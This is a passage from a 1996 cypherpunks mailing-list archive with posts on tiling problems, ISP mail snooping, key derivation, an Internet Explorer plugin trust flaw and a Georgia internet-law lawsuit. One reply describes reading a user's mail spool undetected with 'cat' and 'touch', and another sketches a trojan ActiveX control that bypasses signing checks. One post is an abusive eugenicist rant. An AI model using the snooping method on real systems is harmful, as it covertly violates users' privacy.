combinatorially-explosive problems. (Remember, it doesn't take a very big
RSA product before the 10^75 elementary particles in the Universe are not
enough to factor it in a billion times the age of the Universe even if
every particle were a Cray! So much for a tank full of DNA computers.)

The domino snake or tiling problem is a similarly explosive problem. Try
playing around with some tiles on even a 5 x 5 grid, and then contemplate
how large 25! is. Then think about a 10 x 10 grid, and 100! Then a 100 x
100 grid.

And it may be that the domino snake reaching from tile A to tile B snakes
around and about in a far, far larger grid space than this! (Even if one is
confined to a 100 x 100 grid, easily displayed on a sheet of graph paper,
no intelligence in the universe will ever be able to find a snake reaching
from A to B, except in special situations (e.g., the same tile, etc.).)

This sort of problem is the essence of some "zero knowledge interactive
proof systems" (ZKIPS) sorts of proofs. I present such a snake as proof
that I am who I say I am. (Because I just "made up" some random snake, then
announced only the starting and stopping points, A and B. Nobody else in
the universe could ever find such a snake, but I can display my solution as
proof I generated it in the first place. Of course, once shown I have given
the proof away to everyone. The ZKIPS trick is in twiddling the grid and/or
tiles in such a way that I can give _probabalistic_ information away. I
don't know how to do this for the domino snake problem, but it's easy to
understand the Hamiltonian cycle version.)

--Tim May

(Late News: I just heard (12:30 p.m., PDT) that Seymour Cray is in
extremely critical condition after suffering head injuries in a car crash.
It will be a sad day if he dies, or is permanently disabled. Though he
started working for the Agency in the 1950s, in a precursor to Control Data
Corporation, and worked for them on various contracts in the next couple of
decades, he was a true pioneer. (The CDC 6600, 7600, etc., and the Cray-1
were funded by contracts from the AEC and NSA, and the first few of each
were delivered to Fort Meade, Los Alamos, Livermore, etc.))


We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Tue, 24 Sep 1996 18:55:01 +0800
To: "Michael E. Carboy" <cypherpunks@toad.com
Subject: Re: Snooping ISP admin??
In-Reply-To: <32468D68.5E2@hooked.net>
Message-ID: <Pine.LNX.3.95.960923124300.406A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 23 Sep 1996, Michael E. Carboy wrote:

> Greetings All,
> 
> Question for the group:  I have encountered a situation that causes me
> to believe an ISP is snoopingthrough encrytped mail.  It seems that
> PGP'd mail has aroused the curiosity of an ISP (not hooked.net).. I have
> encountered "POP3 account in use by another user" several times in the
> past few days and I am the only user... wondering if that "in use"
> messsage is the result of a clumsy sysadmin being caught with his hand
> in the cookie jar.  Any thoughts from the group???  If those more
> knowledgeable than I deem these NOISE... my sincere apologies.

Any sysadmin using POP3 to snoop through your mail would have to be a complete
moron.  It's much easier to just "cat /usr/spool/mail/user" which is
undetectable.  The sysadmin could then use touch to set the "last read" value
to the previous value.  Anyone with complete access to the POP3 server would
be able to snoop through anyone's mail undetected.  My guess is that you are
getting that error from a stale lockfile.  If any sysadmin is snooping through
your mail, you wouldn't know it.

Mark
- -- 
PGP encrypted mail prefered.
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMka/4CzIPc7jvyFpAQGc8gf/WgKKIzTnh+FO3V8YLEn4ZjFL1SVtMzyT
SsOQ+DXiEPt4Cul4PKGaBtmkvJoVgUuVp6HanbQAtsQhCBi/P5xrVU2lvIjx4K/+
c0PfSmbpc8GrAy8QeCpGMRkBYOgPyqG3A+v7nG7NGcxsShiGewMbAfjpKz/mKjsU
tqAc5VUHTAIbuvUW8OUss0u8/6DmRFcfxNmtGJXw7bgfnxilwpRsW5cUEyJaO0ni
pBbiN41nssXP5pYN75odZBzEpycmwdRfLaEHCIV0yKFSfugYNI5mUWqpMVxe25bL
csel/zdg07B3NRvLg3LJ6kf73WUS3U+KDl7Rgt7Yv0qbEZRl+hk4fA==
=DIH1
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Tue, 24 Sep 1996 18:29:43 +0800
To: cypherpunks@toad.com
Subject: Re: William Torbitt (pseudonym)
In-Reply-To: <ae69eea103021004221b@[207.167.93.63]>
Message-ID: <Pine.LNX.3.95.960923130856.455A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 21 Sep 1996, Timothy C. May wrote:

> Presumably the same William Torbitt (psuedonym) who wrote the
> Samizdat-distributed "Nomenclature of an Assassination Cabal."
> 
> (One of the best treatments of the various swirling connections surrounding
> the JFK assassination and related CIA-Mob-Giancana-Hughes-Castro-etc.
> connections.)
> 
> That Torbitt was a pseudonym has some connection to the themes of our list.
> It is believed by many--and it sounds plausible to me--that the actual
> author was a knowledgeable Texas attorney who had gained much familiarity
> with the facts of the case and, circa 1966-68, wrote his extended pamphlet
> "The Nomenclature of an Assassination Cabal." Fearing likely sanctions,
> both professional and personal, he chose not to use his real name, and
> pamphlet circulated informally, without a formal publisher.
> 
> (It is not written in a wacko-style, so I don't dismiss it as the ravings
> of a loon.)
> 
> I haven't checked to see if its on the Web.

No, but for anyone who's interested, it's available from Prevailing Winds
Research (http://www.prevailingwinds.org) for about $7.

-- 
PGP encrypted mail prefered.
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim McCoy <mccoy@communities.com>
Date: Tue, 24 Sep 1996 08:30:50 +0800
To: cypherpunks@toad.com
Subject: Re: provably hard PK cryptosystems
In-Reply-To: <ae6b6083050210047554@[207.167.93.63]>
Message-ID: <v03007802ae6caaf3c35f@[205.162.51.35]>
MIME-Version: 1.0
Content-Type: text/plain


Asgaard <asgaard@Cor.sos.sll.se> writes:

>On Sun, 22 Sep 1996, Timothy C. May wrote:
>> Suppose a tile is placed at some place on the grid, and another tile
>> (possibly a different tile, possibly the same type of tile) is placed some
>> distance away on the grid. The problem is this: Can a "domino snake" be
>> found which reaches from the first tile to the second tile, with the
>> constraint that edges must match up on all tiles? (And all tiles must be in
>> normal grid locations, of course)
>
>Intuitively (but very well not, I'm not informed enough to know)
>this might be a suitable problem for Hellman's DNA computer, the
>one used for chaining the shortest route including a defined
>number of cities?

Solving such a problem is easy to break down into parallel steps, but
the advantage of using the infinite plane (or even a plane with "really
large" boundaries) which Tim mentioned is that you can make the search
space larger than anything which can possibly be solved in a reasonable
amount of time by these methods.  For example, factoring composites of
very large primes can also be done by such massively parallel systems, but
othe individual parts are no faster (actually they are almost always slower)
than regular computing elements.  Given a large enough search space even
a parallel system runs out of processing elements.

jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 24 Sep 1996 10:58:22 +0800
To: cypherpunks@toad.com
Subject: Re: Public Schools
In-Reply-To: <3.0b19.32.19960923103721.00a13340@panix.com>
Message-ID: <wNZPuD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Duncan Frissell <frissell@panix.com> writes:
> As a libertarian, I would add that the social atmosphere of a Stalinist
> "brain factory" is not exactly the socialization I would choose for my
> children.  I would choose a more market oriented model.

Libertarians are fucking statists, as I keep pointing out.

U.S. public school system is darwinian evolution in action. Parents who can
afford to send their kids to private schools, do so. Parents who send their
kids to public schools deserve to have their offsprings fucked up, mentally
and phsyically, to improve the species' gene pool.

There are plenty of excellent private elementary and secondary schools in the
U.S. Children who deserve better schooling (by virtue of having parents who
have better genes and are therefore economically successful) get it.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 24 Sep 1996 11:27:23 +0800
To: tank <tank@xs4all.nl>
Subject: Re: We removed radikal 154 from xs4all :(
Message-ID: <ae6c48b904021004a5e5@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:31 PM 9/23/96, tank wrote:
>Hi all,
>
>We have temporary removed radikal 154 from xs4all.
>
>We did this because the german ICTF and BAW continued to stop IP-traffic
>to and from xs4all. They not only blocked the web-server (with more than
...


Unfortunately, this means that Germany wins.

This will embolden Germany and other nations to apply similar pressures to
other ISPs.

While I don't fully understand the economic pressures the IP-traffic
blockage may have had on your site, it is sad that a user account has been
removed because some foreign government doesn't like it.

My recommendation is that you restore radikal 154's account immediately,
and post a message to all customers and on various Net forums indicating
you will not remove user accounts for materials which do not violate your
own national laws.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Fricker <jfricker@vertexgroup.com>
Date: Tue, 24 Sep 1996 12:41:11 +0800
To: cypherpunks@toad.com
Subject: RE: SAK_net
Message-ID: <19960923211212041.AAA185@dev.vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>John Young (jya@pipeline.com) said something about SAK_net on or about 9/23/96 12:59 PM

>
>   9-23-96. WaJo:
>
>   "SAIC Is Near Agreement to Buy Bellcore"
>

Didn't SAIC buy Network Solutions (registration part of the NIC) as well?

-----BEGIN PGP SIGNATURE-----
Version: 2.9

iQCVAgUBMkb+NbuA0owOB/fpAQGeEwQAoUellf90G+TKT+Lyeqsi21iFqQwNCx5S
XJMmLCq6L2bb4L04I15Vz4yk2o8spHgCVKz0bqir16CFr0dCPd74OdIZ6e2mUsGT
y5qyFsyE4FCFVt4/1UN1Oeeb2Ap/9Yk/NA4ZM2BNvLqHw7JP6+vvdL7rtCPxRF7u
g0RgvJ8NNh4=
=K7QY
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer@c2.net
Date: Tue, 24 Sep 1996 11:03:15 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: We removed radikal 154 from xs4all :(
In-Reply-To: <ae6c48b904021004a5e5@[207.167.93.63]>
Message-ID: <199609232122.OAA15542@atropos.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> Unfortunately, this means that Germany wins.

	How does this mean that Germany wins? "radikal 154" is still
available all over the world, at almost 50 mirror sites, I beleive
(including http://www.c2.net/radikal/), which are *not* blocked by
Germany.

-- 
Sameer Parekh					Voice:   510-986-8770
C2Net						FAX:     510-986-8777
The Internet Privacy Provider
http://www.c2.net/				sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "strick (henry strickland)" <strick@versant.com>
Date: Tue, 24 Sep 1996 11:32:50 +0800
To: johnbr@atl.mindspring.com (John Brothers)
Subject: Blocks Colon [Re: Internet File System]
In-Reply-To: <1.5.4.32.19960922191022.00736898@pop.mindspring.com>
Message-ID: <9609232130.AA03957@vp.versant.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

# The other day, it occurred to me that Java could really take off if there
# was some sort of file system.  And, since you can't write to local files
# with Java, the obvious solution is to set up the 'fopen, fclose(), etc)
# set of functions that are 'rpcs' to some server application on the same
# computer as the web server the applet comes from.


Here's my crypto-friendly design for this. 


Define a new TCP protocol called "Blocks Colon".
It forms URLs like

	blocks://blocks.aol.com/strick

This protocol is similar to a "block device" in unix,
with basic operations to read and write 512-octet blocks,
named by an integer index.  Other operations are to ask the size 
of the block file, to change its size, to commit/abort changes,
and session authentication (like a POP server).




Then in the JAVA box you need

	-- a class implementing a 'filesystem' (files & directories)
	   on a "block device"

	-- a "block encryption" filter

	-- a "block device" client using the "blocks colon" protocol


So your program uses the filesystem object, which uses
the block encryption filter, which uses the block client,
which goes to your ISP's block service.   The internet and
your ISP sees nothing but encrypted blocks.   The encryption key
never leaves your personal java box.

Your ISP charges you by the block/hour for storage, and by the number
of blocks read/written for network.  You could keep a backup
blocks account at another ISP, and keep the two blocks mirrored
(another filter?) or run occasional backups. 



What annoys me is that java.io.* defines specific classes for
filesystem access, rather than a "factory class" and thereafter 
nothing but interfaces.  That makes it difficult to override
the "builtin" notion of a filesystem with network-based or
crypto-based filesystems, without changing your programs,
or tampering with the builtin classes.  :(


strick



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBaAwUBMkcA0xLAL4qMWktlAQEWPwInbnDWq9o1eosKVCqwjuj+7pDlJ8CRaNCt
XflpcmyK8di9rQKS5CMGnSdfvOVJA4epJsGAAKuLfPcSAn4yuKLfsJBcm/Is
=DLWN
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Tue, 24 Sep 1996 10:43:35 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Bernstein hearing: The Press Release
In-Reply-To: <ae6c0d03000210049e3a@[207.167.93.63]>
Message-ID: <Pine.3.89.9609231440.A14516-0100000@netcom9>
MIME-Version: 1.0
Content-Type: text/plain





On Mon, 23 Sep 1996, Timothy C. May wrote:

> Whoops! I didn't mean to intersect with "workplace" issues--I mean simple,
> pure, nonworkplace-related speech.

As long as the person that you are speaking to is employed in any way,
workplace issues apply. Even if you talk to the person after work and away
from their place of employment. The courts have ruled that the speech does
not have to occur at the workplace to be prohibited. All that is required
is that the person is affected at the workplace. 

Yes, you can be sued for sexual harrasment for trying to pick up a
stranger in a bar, should that stranger still feel bothered by your
advances while at work the next day. 

The courts have ruled,

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stanton McCandlish <mech@eff.org>
Date: Tue, 24 Sep 1996 11:01:37 +0800
To: comp-org-eff-talk@eff.org (comp.org.eff.talk gate)
Subject: US Govt. recent involvement in digital money & dig. signature issues
Message-ID: <199609232219.PAA09930@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


[Excerpted from Edupage.]

ALL EYES ON E-MONEY
Treasury Secretary Robert Rubin has formed a task force to examine what
impact the move toward electronic money transfer and storage technologies
will have on consumers.  Specifically, the team will look at how these
technologies will affect lower-income Americans, and assess standards for
consumer protection.  The task force also will come up with non-regulatory
measures that can be taken to protect consumers while allowing the market to
develop.  "I want to be certain that we make the right decisions as we begin
this new era so that the benefits of these developments are broadly shared
and have a positive impact on our economy," says Rubin.  (Investor's
Business Daily 20 Sep 96 A19)  Meanwhile, the Bank of Japan and Nippon
Telegraph & Telephone Corp. have jointly developed a very advanced, secure
electronic money system, using NTT's high-speed digital signature system and
its patented E-sign algorithm.  The new system allows a number of banks to
issue the same type of e-money to customers, relieving them of the
responsibility of developing their own proprietary e-money systems.  NTT
hopes its new system will become the de facto standard for e-money in the
country. (BNA Daily Report for Executives 13 Sep 96 A2)

[...]

POSTAL SERVICE TESTS ELECTRONIC POSTMARK
The U.S. Postal Service is testing a system that would place an electronic
postmark on e-mail messages, verifying the date and time the message was
sent, and guaranteeing that the content had not been tampered with.  The new
system would enable more business functions to be conducted electronically,
and would also provide an archive service, maintaining copies of
"e-postmarked" mail, should any questions arise later.  The current test
will determine what price people would expect to pay for such a service, and
which features work best.  (St. Petersburg Times 20 Sep 96 E6)

--
<HTML><A HREF="http://www.eff.org/~mech/">    Stanton McCandlish
</A><HR><A HREF="mailto:mech@eff.org">        mech@eff.org
</A><P><A HREF="http://www.eff.org/">         Electronic Frontier Foundation
</A><P>        Online Activist    </HTML>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: camcc@abraxis.com
Date: Tue, 24 Sep 1996 10:34:33 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: GA HB1630 Lawsuit:  Press Advisory
Message-ID: <2.2.32.19960923194301.0069bebc@smtp1.abraxis.com>
MIME-Version: 1.0
Content-Type: text/plain


>X-Sender: rcostner@intergate.net

>Reply-To: efg-action@ninja.techwood.org
>
>Joint Media Advisory: 
>
>AMERICAN CIVIL LIBERTIES UNION 
>ELECTRONIC FRONTIERS GEORGIA
>REP. MITCHELL KAYE
>
>Groups to Mount Legal Challenge to Georgia Cyberspace Law
>
>FOR IMMEDIATE RELEASE	Contact: See list below
>Friday, September 20, 1996	
>
>	ATLANTA, GA-- -The American Civil Liberties Union, Electronic Frontiers
>Georgia, Georgia State Representative Mitchell Kaye (R-Marietta) and others
>will be holding a news conference on Tuesday, September 24 at 10:30 a.m.,
>immediately after filing a lawsuit seeking a preliminary injunction against a
>Georgia law barring communications in cyberspace.  
>
>	The suit names Governor Zell Miller and Attorney General Michael Bowers as 
>defendants, and will be filed on behalf of 13 plaintiffs.
>------------------------------------------------------------------------------
>--------------------------------------
>
>     WHO:	
>
>Attorneys Ann Beeson (ACLU) and Scott McClain (Bondurant, Mixson & Elmore)
>		
>Plaintiffs Robert Costner (executive director, Electronic Frontiers Georgia);
>Jeff Graham (AIDS Survival Project); Rep. Mitchell Kaye (GA House of
>Representatives); Bonnie Nadri (The Page Factory);  Teresa Nelson (ACLU of
>Georgia); Eric Van Pelt  (Atlanta Veterans Alliance); Josh Riley (individual
>plaintiff); and Kimberly LyleWilson (Atlanta Freethought Society).
>	
>     WHAT:
>
>News conference to announce filing of legal challenge to Georgia
>cyberspace law.
>
>     WHEN:
>
>Tuesday, September 24, 10:30 a.m.
>
>     WHERE:
>
>ACLU of Georgia 
>142 Mitchell Street SW (at Peachtree), Suite 301, Atlanta 
>(404) 523-6201  
>
>Note: Copies of the brief and plaintiff affidavits will be available at the
>news conference and online at the EFGA website, <http://www.efga.org/>  and
>through the ACLU's website  <http://www.aclu.org> and America Online site
>(keyword: ACLU).  
>
>Contacts:       Teresa Nelson, ACLU GA Ann Beeson, national ACLU: 404-523-6201
>		Robert Costner, EFGA: 770-512-8746
>		Rep. Mitchell Kaye: 770-998-2399
>		Scott McClain: 404-881-4138
>		Emily Whitfield, ACLU Nat'l Press Office: 212-944-9800 x426
>
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: camcc@abraxis.com
Date: Tue, 24 Sep 1996 09:11:24 +0800
To: cypherpunks@toad.com
Subject: Live Cybercast of GA lawsuit press conference
Message-ID: <2.2.32.19960923194304.006aacb0@smtp1.abraxis.com>
MIME-Version: 1.0
Content-Type: text/plain


>X-Sender: rcostner@intergate.net
>Date: Mon, 23 Sep 1996 11:48:46 -0400
>To: efg-action@ninja.techwood.org
>Reply-To: efg-action@ninja.techwood.org
>
>Live Cybercast of HB1630 lawsuit press conference
>
>The ACLU, Electronic Frontiers Georgia, Mitchell Kaye (Georgia State 
>Representative), and others will hold a press conference on their lawsuit 
>against the State of Georgia, concerning HB1630, which is now law. The joint 
>press conference will be broacast live on the internet at 10:30 am on Tuesday
>September 24, 1996. To listen to the press conference, see 
>
>    http://www.efga.org/realaudio/hb1630.htm
>
>A note about EFGA:  Electronic Frontiers Georgia has a new website 
><http://www.efga.org/>.  We are now referring to ourselves as EFGA, rather 
>than EFG.  Please update your websites accordingly.
>
>     -- Robert Costner  (770) 512-8746
>        Electronic Frontiers Georgia
>        rcostner@intergate.net
>        http://www.efga.org/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Tue, 24 Sep 1996 05:54:30 +0800
To: cypherpunks@toad.com
Subject: SAK_net
Message-ID: <199609231550.PAA28937@pipe3.ny3.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   9-23-96. WaJo: 
 
   "SAIC Is Near Agreement to Buy Bellcore" 
 
      Bellcore led a team that cracked RSA-129, a computer 
      code once thought uncrackable, proving the vulnerability 
      of such systems. It holds hundreds of patents governing 
      numerous aspects of the U.S. infrastructure. 
 
      SAIC specializes in systems integration, national 
      security, transportation and health care. SAIC is 
      expected to tap into Bellcore's considerable software 
      talent as it continues to pursue new contracts. 
 
      Bellcore boasts network expertise that is second to 
      none. Bellcore also helps companies recover from network 
      failures, and its experts are widely regarded as masters 
      at foiling computer viruses and at the intricacies of 
      technical standards. Those talents will no doubt add 
      value to SAIC's considerable technical assets and 
      expertise. 
 
   ----- 
 
   http://jya.com/saknet.txt  (7 kb) 
 
   SAK_net 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Tue, 24 Sep 1996 10:03:35 +0800
To: cypherpunks@toad.com
Subject: Another security problem reported in Microsoft's Internet Explor
Message-ID: <199609232003.NAA24214@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


(This is posted to both www-security and cypherpunks. Please be
careful where you send responses).

See:
http://www.news.com/News/Item/0,4,3707,00.html 
at C|net's news site for the whole story. 

Short version:

InfoSpace has released a program as an IE plugin, which,
once the user has agreed to install it, registers InfoSpace
as a 'trusted publisher' in Explorer. This apparently means that 
later requests to download Infospace programs would not 
trigger the dialog boxes requesting permission to download.

InfoSpace describes this as a bug, and is releasing a corrected
version. 

Commentary:

I hope that all IE plugin (ActiveX, script, whatever) publishers are
as responsive.

Ideally, I suppose, a downloaded executable component should
not be able to silently manipulate the security policies of the system it
arrives on, but it's hard to see how to prevent this in Microsoft's active
content model.

The Java model is more robustly protected against this problem,
but as a result is not as capable.

The scary thing is that a clever author of Trojan horses could write an
ActiveX control which does nothing but open the gates, and let other
programs in without the Authenticode check. It could even let in 
another version of itself, which is also properly signed, but has no
malicous code. Thus, it could cover it's tracks.

Peter Trei
trei@process.com 
Disclaimer:  I do not represent my employer.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 24 Sep 1996 09:38:27 +0800
To: cypherpunks@toad.com
Subject: Re: TAG_ent
Message-ID: <3.0b19.32.19960923154738.009fceb0@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


>   security issues are solved, he said. "The Internet is 
>   fundamentally flawed in that regard right now," Reed 
>   said. "At this moment in time at least, we at Citicorp 
>   would feel very uncomfortable accommodating any 
>   transactions on the Internet," he said. 

But then they thought Plus and Cirrus were bad ideas as well.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas R. Floyd" <dfloyd@io.com>
Date: Tue, 24 Sep 1996 10:56:09 +0800
To: carboy@hooked.net (Michael E. Carboy)
Subject: Re: Snooping ISP admin??
In-Reply-To: <32468D68.5E2@hooked.net>
Message-ID: <199609232112.QAA07155@xanadu.io.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Greetings All,
> 
> Question for the group:  I have encountered a situation that causes me
> to believe an ISP is snoopingthrough encrytped mail.  It seems that
> PGP'd mail has aroused the curiosity of an ISP (not hooked.net).. I have
> encountered "POP3 account in use by another user" several times in the
> past few days and I am the only user... wondering if that "in use"
> messsage is the result of a clumsy sysadmin being caught with his hand
> in the cookie jar.  Any thoughts from the group???  If those more
> knowledgeable than I deem these NOISE... my sincere apologies.

An admin could just copy the mail spool file to a safer place, then read
through at their leisure.

Unless its someone totally clueless (which some ISP's are), I doubt that
they are pulling off the pop3d.  It could be that your mail spool file is
locked by a mail transport agent, and that is why that error message is
occuring.

Any thoughts?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Tue, 24 Sep 1996 11:02:43 +0800
To: cypherpunks@toad.com
Subject: Factoring technique, faster than trial division?
Message-ID: <843513658.17121.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



just an idea I came up with today, I don`t suggest it is a fast 
factoring method, but it would be interesting to know if it is faster 
than say trial division:

Calcuate a composite number H such that H has a large number of prime 
factors (hundreds).

now  use the euclidean algorithm to try to find a gcd of X (the 
number being factored) and H, if there is none try a new H, if there 
is you have found a factor.

It is hardly elegant but I would nevertheless be interested to see if 
it is apreciably faster than other kludge methods like trial 
division. 


  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut001@cs.auckland.ac.nz
Date: Mon, 23 Sep 1996 14:37:24 +0800
To: cypherpunks@toad.com
Subject: Transforming variable-length to fixed keys
Message-ID: <84345225525232@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


I posted this to sci.crypt recently but the response to it was rather
underwhelming, so I thought I'd repost it here to see if anyone has any
comments on it.  What it is is a scheme for transforming arbitrary user keys
(typically a long passphrase) into a fixed-length key for a particular
algorithm.  This has the following properties:
 
1. The user key 'userKey' is transformed into an algorithm-specific key 'key'
   using a number of 'iterations' of a hash algorithm 'hash()'.
 
2. The transformation is strongly serialized so that any form of attack
   involving parallelization or precomputation isn't possible.
 
3. The transformation is non-reversible, so that recovering the transformed key
   won't recover the original key.
 
4. The result of the transformation is algorithm-dependant, so that if an
   attacker recovers a transformed key for one algorithm they can't recover the
   transformed key (from the same user key) for another algorithm.
 
5. The transformation can be iterated as often as required to make
   password-guessing attacks difficult.
 
6. The transformation process is algorithm-independant and can use any type of
   hash algorithm and original and transformed key size.
 
The transformation algorithm (which was designed with the help of John Kelsey)
is as follows:
 
   key[] = { 0 };
   state = hash( algorithm, mode, parameters, userKey );
 
   for count = 1 to iterations
     for length = 1 to keyLength (in hash_output_size blocks)
       state = hash( state );
       key[ length ] = hash( state, userKey );
 
The state acts as an RNG which ensures that the key hashing is serialized.
 
The initial state depends on all encryption parameters, not just the user key.
If we hashed the user key directly and then used it for a number of algorithms
then someone who could recover the transformed key for one algorithm could
compromise it if used for other algorithms (for example recovering a DES key
would also recover half an IDEA key).  Hashing all algorithm-related parameters
means that a successful attack one an algorithm, mode, or configuration won't
allow the key for any other algorithm, mode, or configuration to be recovered.
 
The code which implements the iterated hashing is:
 
  /* Hash the variable-length input to a fixed-length output */
  memset( key, 0, keyLength );
  for( count = 0; count < iterations; count++ )
    {
    for( keyIndex = 0; keyIndex < keyLength; keyIndex += hashOutputSize )
      {
      /* state = hash( state ); key[ n ] = hash( state, userKey ) */
      hash( state, state,   hashOutputSize, HASH_ALL );
      hash( NULL,  state,   hashOutputSize, HASH_START );
      hash( temp,  userKey, userKeyLength,  HASH_END );
             |         |          |
           output    input   input size
 
      /* Copy as much of the hashed data as required to the output */
      length = ( keyLength - keyIndex ) % hashOutputSize;
      for( i = 0; i < length; i++ )
        key[ i ] ^= temp[ i ];
      }
    }
 
Peter.
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew Gream <matt@lust.bio.uts.edu.au>
Date: Mon, 23 Sep 1996 17:05:58 +0800
To: cjh@osa.com.au
Subject: Re: (Fwd) Australian "ITAR" regulations
In-Reply-To: <199609230132.LAA08960@rosella.osa.com.au>
Message-ID: <199609230619.QAA16932@lust.bio.uts.edu.au>
MIME-Version: 1.0
Content-Type: text/plain



Hi there,

> An anonymous opinion from inside the Defence Dept holds that electronic
> bits on a wire do not constitute goods, and as a result if you ship
> electronically, you are not subject to the regulations.  If you ship a
> CD or floppy or other physical media containing software, you violate the
> regulations.

Watch out for those anonymous opinions; I received exactly the opposite
opinion when I spoke to the Defence Signals Directorate about the issue
(back in 1994) -- after specifically asking about a few hypothetical
cases. Of course, either opinion may be correct, which is the real
problem!

> I'll add this to the SSLeay legality FAQ - standard disclaimers apply
> of course, obtain professional legal advice before exporting SSLeay.

Definitely ... what a pain, however :-(.

Best of luck!
Matthew.

-- 
Matthew Gream -- matt@lust.bio.uts.edu.au.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: laverty@matrixNet.com
Date: Tue, 24 Sep 1996 10:09:39 +0800
To: cypherpunks@toad.com
Subject: Re: A daily warning regarding Tim ... [edited]
Message-ID: <2.2.32.19960923202301.009551fc@sunrise.matrixnet.com>
MIME-Version: 1.0
Content-Type: text/plain


Eudora Pro 2.2 will also filter out all of the crap...

At 08:24 AM 9/23/96 -0500, you wrote:
>>On Fri, 20 Sep 1996, John Anonymous MacDonald wrote:
>>
>>> Tim C[*] * studied yoga back-streching exercises for
>>> five years so he could * * (*).
>>
>>Likely the NSA has nothing better to do these days.  They got bored with
>>just listening, so now they're spamming.  Can we lock this fucker out of
>>the list?  Sure, he'll probably pick another nym to post from...
>>
>
>
>Can't lock him out of the list, but you can either set up a kill file, or find
>something like the 3.0b version of Eudora, which has filters; you can set it up
>where, if an incoming message has a certain From: string, it is transferred
>directly into the Trash mail folder, which is, as a rule, cleaned up before
>quitting.
>
>Daniel.
>
>--
>If in fact we are the only intelligent life on this planet, why the fuck are
>we in this goddamn mess?
>--
>Find my public key on the World Wide Web -- point your browser at:
>http://bs.mit.edu:8001/pks-toplev.html
>
>
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Emery" <die@pig.die.com>
Date: Tue, 24 Sep 1996 10:42:05 +0800
To: cypherpunks@toad.com
Subject: Crypto Files in the BA Archives (fwd)
Message-ID: <9609232028.AA23926@pig.die.com>
MIME-Version: 1.0
Content-Type: text/plain


